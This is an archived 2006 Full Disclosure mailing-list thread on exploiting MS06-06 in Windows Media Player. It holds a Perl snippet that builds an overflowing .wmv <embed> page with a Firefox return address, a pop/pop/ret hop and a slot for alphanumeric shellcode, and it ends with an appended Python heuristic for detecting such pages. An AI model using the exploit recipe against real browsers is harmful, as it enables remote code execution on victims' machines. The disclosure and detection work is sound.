Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: H D Moore <fdlist () digitaloffense net>
Date: Thu, 16 Feb 2006 17:23:23 -0600
Still getting some annoying crashes (SEH trick in alphanum code is annoying when you are trying to debug something...), but the basic solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

    my $pattern = Pex::Text::PatternCreate(16384);
    substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
    substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
    substr($pattern, 2090, length($shellcode), $shellcode);
    $content = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dll in Firefox 1.5.0.1, you should auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
> No exploit, just some basic research - anyone with 100% Ascii win32 shellcode?
>
> http://open-security.org/winmedia/index.html
>
> --
> regards
> c0ntex
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
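A defender-side heuristic for pages built the way this post describes, added here as an illustration and not code from the thread: it pulls the src of each <embed> (and data of <object>), flags names far longer than any real media path or made of long alphanumeric runs, and reports where the first byte above 0x7F sits. The thresholds, the _SrcCollector/analyze_src/scan_html names and the sample page are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# Thresholds are assumptions chosen for this example, not values from the thread.
MAX_SANE_SRC_LEN = 1024   # real media paths are nowhere near the ~16 KB name in the post
MIN_ALNUM_RUN = 512       # long pure [A-Za-z0-9] runs hint at alphanumeric-encoded code

class _SrcCollector(HTMLParser):
    """Collect media references: <embed src=...> and <object data=...>."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is not None and (tag, name) in (("embed", "src"), ("object", "data")):
                self.sources.append(value)

def analyze_src(src):
    """Heuristics for one media reference, returned as a dict."""
    raw = src.encode("latin-1", errors="replace")
    high = [i for i, b in enumerate(raw) if b > 0x7F]
    runs = [len(m.group(0)) for m in re.finditer(rb"[A-Za-z0-9]+", raw)]
    info = {
        "length": len(raw),
        "is_wmv": src.lower().endswith(".wmv"),
        "first_high_byte_offset": high[0] if high else None,   # None when all bytes are 7-bit
        "longest_alnum_run": max(runs, default=0),
    }
    info["suspicious"] = (info["length"] > MAX_SANE_SRC_LEN
                          or info["longest_alnum_run"] >= MIN_ALNUM_RUN)
    return info

def scan_html(html):
    """Return one analysis dict per media reference found in the page."""
    collector = _SrcCollector()
    collector.feed(html)
    collector.close()
    return [analyze_src(s) for s in collector.sources]

# Constructed sample: one benign reference and one with a 3000-character name
# followed by two bytes above 0x7F (filler, not a real payload).
SAMPLE_HTML = (
    '<html><body><embed src="intro.wmv">'
    '<embed src="' + "Z" * 3000 + "\xc0\xde" + '.wmv"></body></html>'
)
```

Run scan_html over fetched or proxied HTML; the offset of the first high byte tells an analyst where the 7-bit constraint the post discusses was broken, which is useful when triaging a suspected sample.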